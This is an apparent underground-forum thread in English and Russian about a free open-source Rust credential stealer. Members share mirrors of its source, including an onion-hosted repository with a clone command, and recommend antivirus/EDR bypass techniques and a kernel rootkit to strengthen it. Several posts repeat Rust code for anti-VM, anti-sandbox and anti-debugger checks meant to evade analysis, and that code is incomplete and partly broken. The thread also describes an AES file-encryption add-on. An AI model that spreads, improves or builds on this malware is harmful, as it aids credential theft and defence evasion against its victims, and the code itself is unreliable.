FREE & opensrc Rust Stealer

[DoKitO]

Посмотреть вложение 51228

dokito gitbucket site is down

prob down due to attacks again lol

 

[Samedit_Marais]

prob down due to attacks again lol

DDoS?

Might be better to use Tor onion and use LockBit Ransomware method to defend from DDoS.

AFAIK, it require a visitor to run javascript, then compute the hash in Tor Browser
The hash generated in client will be checked to match a hash in server.

If it match, client will use it as authkey in headers.

Tor Project | Client Authorization

Defend yourself against tracking and surveillance. Circumvent censorship. | Client Authorization

community.torproject.org

 

[Samedit_Marais]

But yeah, its too overkill doing it only for code sharing platform

Just want to extract whats on my mind tho..

 

[Samedit_Marais]

LockBit 2.0 Ransomware add DDoS protection to victim blog - RedPacket Security

The ransomware group have added DDoS protection to the victim blog using Nginx-Lua-Anti-DDoS from the github repo located here:

www.redpacketsecurity.com

 

[DoKitO]

DDoS?

Might be better to use Tor onion and use LockBit Ransomware method to defend from DDoS.

AFAIK, it require a visitor to run javascript, then compute the hash in Tor Browser
The hash generated in client will be checked to match a hash in server.

If it match, client will use it as authkey in headers.

Tor Project | Client Authorization

Defend yourself against tracking and surveillance. Circumvent censorship. | Client Authorization

community.torproject.org

JS protections have long been bypassed, also most ppl have JS disabled in TOR

 

[dwongz]

I try many method to add icon in Rust but not work. Do you support add icon in future?

 

[DoKitO]

I try many method to add icon in Rust but not work. Do you support add icon in future?

A Icon can manually be added like on every other exe, I dont think its my responsibility to add a icon changer so for now not

 

[dwongz]

For someone need add icon to binary file. Try this https://stackoverflow.com/a/64548141/6778570

 

[shook_1]

I still have it up on git

 

[Samedit_Marais]

JS protections have long been bypassed, also most ppl have JS disabled in TOR

hmmm... okay.
but why your gitbucket HTTP only ? >.<

use this command to generate JKS certificate

keytool -genkey -keyalg RSA -alias selfsigned -keystore dokitokeystore.jks -storepass dokitostrongpass -validity 360 -keysize 2048

and re-run your gitbucket.war process


java -jar gitbucket.war --connectors=https --key_store_path=./dokitokeystore.jks --key_store_password=dokitostrongpass --key_manager_password=dokitostrongpass

then it should be available as https://bertylol.tech:8443

sure you can always change default port. refer to this again:

Basic configurations

A Git platform powered by Scala with easy installation, high extensibility & GitHub API compatibility - gitbucket/gitbucket

github.com

 

[DoKitO]

hmmm... okay.
but why your gitbucket HTTP only ? >.<

use this command to generate JKS certificate

keytool -genkey -keyalg RSA -alias selfsigned -keystore dokitokeystore.jks -storepass dokitostrongpass -validity 360 -keysize 2048

and re-run your gitbucket.war process


java -jar gitbucket.war --connectors=https --key_store_path=./dokitokeystore.jks --key_store_password=dokitostrongpass --key_manager_password=dokitostrongpass

then it should be available as https://bertylol.tech:8443

sure you can always change default port. refer to this again:

Basic configurations

A Git platform powered by Scala with easy installation, high extensibility & GitHub API compatibility - gitbucket/gitbucket

github.com

Was too lazy for it

 

[shook_1]

here:

GitHub - md-irl/rust-LucaStlr-latest: Wouldnt you love to know, you have to take a look to know what it is

Wouldnt you love to know, you have to take a look to know what it is - GitHub - md-irl/rust-LucaStlr-latest: Wouldnt you love to know, you have to take a look to know what it is

github.com

 

[Samedit_Marais]

Was too lazy for it

yeah, took me an hour too to find a working command for generating JKS cert haha

 

[Det]

Если есть желания улучшать код данного Stealer стоит изучить данный график.

GitHub - matro7sh/BypassAV: This map lists the essential techniques to bypass anti-virus and EDR

This map lists the essential techniques to bypass anti-virus and EDR - matro7sh/BypassAV

github.com

Можно так-же использовать данную методику

GitHub - SaadAhla/NTDLLReflection: Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll , and trigger exported APIs from the export table

Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll , and trigger exported APIs from the export table ...

github.com

Ну если уже я думаю ставить автозагрузку то в месте с rootkit

GitHub - Idov31/Nidhogg: Nidhogg is an all-in-one simple to use windows kernel rootkit.

Nidhogg is an all-in-one simple to use windows kernel rootkit. - Idov31/Nidhogg

github.com

 

[DoKitO]

Если есть желания улучшать код данного Stealer стоит изучить данный график.

GitHub - matro7sh/BypassAV: This map lists the essential techniques to bypass anti-virus and EDR

This map lists the essential techniques to bypass anti-virus and EDR - matro7sh/BypassAV

github.com

Можно так-же использовать данную методику

GitHub - SaadAhla/NTDLLReflection: Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll , and trigger exported APIs from the export table

Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll , and trigger exported APIs from the export table ...

github.com

Ну если уже я думаю ставить автозагрузку то в месте с rootkit

GitHub - Idov31/Nidhogg: Nidhogg is an all-in-one simple to use windows kernel rootkit.

Nidhogg is an all-in-one simple to use windows kernel rootkit. - Idov31/Nidhogg

github.com

Thanks
Overview:
1: Provides some good anti vm Tips, will implement some of it

2. Needs a Server thats Always up for the stealer to Work

3. Rootkit would be Overkill, also every User would need to sign the driver, or load it via a vulnerable driver

 

[Samedit_Marais]

i hosted a backup mirror here:

https://plcsvmlvifi2ud5ny6t5am3tp4ue43cpmnvkbl2ugdzunaztastq2oqd.onion:8443/samedit/rust-stealer-xss-mirror4feb2023

clone with this command:

export GIT_SSL_NO_VERIFY=1 torify git clone https://plcsvmlvifi2ud5ny6t5am3tp4ue43cpmnvkbl2ugdzunaztastq2oqd.onion:8443/samedit/rust-stealer-xss-mirror4feb2023.git

 

[root3d]

Thanks
Overview:
1: Provides some good anti vm Tips, will implement some of it

2. Needs a Server thats Always up for the stealer to Work

3. Rootkit would be Overkill, also every User would need to sign the driver, or load it via a vulnerable driver

use std::env;
use std::fs::File;
use std::io::prelude::*;
use std::os::unix::process::CommandExt;
use std::path::Path;
use std::process::Command;
use std::process::exit;
use std::thread;
use std::time::Duration;

fn detect_sandbox() -> bool {
    // Check for the presence of files commonly used by sandboxes
    Path::new("/proc/self/status").exists() || Path::new("/proc/cpuinfo").exists() ||
    Path::new("/proc/registry").exists()
}

fn detect_debugger() -> bool {
    let mut process = Command::new("cat")
        .arg("/proc/self/status")
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn()
        .expect("Failed to start cat process");

    let pid = process.id();

    let _result = process.wait_timeout(Duration::from_millis(100));
    let result = match _result {
        Ok(status) => status,
        Err(_) => {
            let _ = process.kill();
            return true;
        }
    };

    if result.code() == Some(0) {
        return false;
    }

    let _ = process.kill();
    match env::var("LD_PRELOAD") {
        Ok(val) => return val.contains("libpthread.so"),
        Err(_) => return false,
    }
}

fn detect_vm() -> bool {
    // Check for the presence of files commonly used by virtual machine software
    Path::new("/dev/vmmon").exists() || Path::new("/dev/kvm").exists() ||
    Path::new("/dev/vboxdrv").exists()
}

fn main() {
    // Add the anti-VM, anti-sandbox, anti-debugging checks
    if detect_sandbox() {
        println!("Warning: You cannot run it in a sandbox environment. The program will now close.");
        exit(1);
    }

    if detect_debugger() {
        println!("Warning: You cannot run it with a debugger attached. The program will now close.");
        exit(1);
    }

    if detect_vm() {
        println!("Warning: You cannot run it in a virtual machine. The program will now close.");
        exit(1);
    }

 

[Samedit_Marais]

use std::env;
use std::fs::File;
use std::io::prelude::*;
use std::os::unix::process::CommandExt;
use std::path::Path;
use std::process::Command;
use std::process::exit;
use std::thread;
use std::time::Duration;

fn detect_sandbox() -> bool {
    // Check for the presence of files commonly used by sandboxes
    Path::new("/proc/self/status").exists() || Path::new("/proc/cpuinfo").exists() ||
    Path::new("/proc/registry").exists()
}

fn detect_debugger() -> bool {
    let mut process = Command::new("cat")
        .arg("/proc/self/status")
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn()
        .expect("Failed to start cat process");

    let pid = process.id();

    let _result = process.wait_timeout(Duration::from_millis(100));
    let result = match _result {
        Ok(status) => status,
        Err(_) => {
            let _ = process.kill();
            return true;
        }
    };

    if result.code() == Some(0) {
        return false;
    }

    let _ = process.kill();
    match env::var("LD_PRELOAD") {
        Ok(val) => return val.contains("libpthread.so"),
        Err(_) => return false,
    }
}

fn detect_vm() -> bool {
    // Check for the presence of files commonly used by virtual machine software
    Path::new("/dev/vmmon").exists() || Path::new("/dev/kvm").exists() ||
    Path::new("/dev/vboxdrv").exists()
}

fn main() {
    // Add the anti-VM, anti-sandbox, anti-debugging checks
    if detect_sandbox() {
        println!("Warning: You cannot run it in a sandbox environment. The program will now close.");
        exit(1);
    }

    if detect_debugger() {
        println!("Warning: You cannot run it with a debugger attached. The program will now close.");
        exit(1);
    }

    if detect_vm() {
        println!("Warning: You cannot run it in a virtual machine. The program will now close.");
        exit(1);
    }

Linux antivm?

 

[Sm1Le_777]

- Implementing enryption with Rust Cryptor (Open-Source) you can drop message me for help.
- It uses the (rand) crate to generate a secure key and nonce. And the aes_ctr crate to perform the AES encryption, file contents are read into memory, encrypted, and then written back to a new file with the extension (.enc).
- Added mod , this will separate the file encryption logic into a separate module, making the code more organized and reusable.

Pass - local

Подскажите плиз, как собрать его. Пробовал cargo build --release, ошибка что нет манифеста, написал левый манифест, потом ошибка при сборке, что библиотека aes_ctr уже не работает. С растом никогда дел не имел. Только С#

 

[root3d]

Please tell me how to collect it. I tried cargo build --release, an error that there is no manifest, wrote the left manifest, then an error during assembly that the aes_ctr library no longer works. Never dealt with growth. Only with#

I will update the latter. for now just cheers.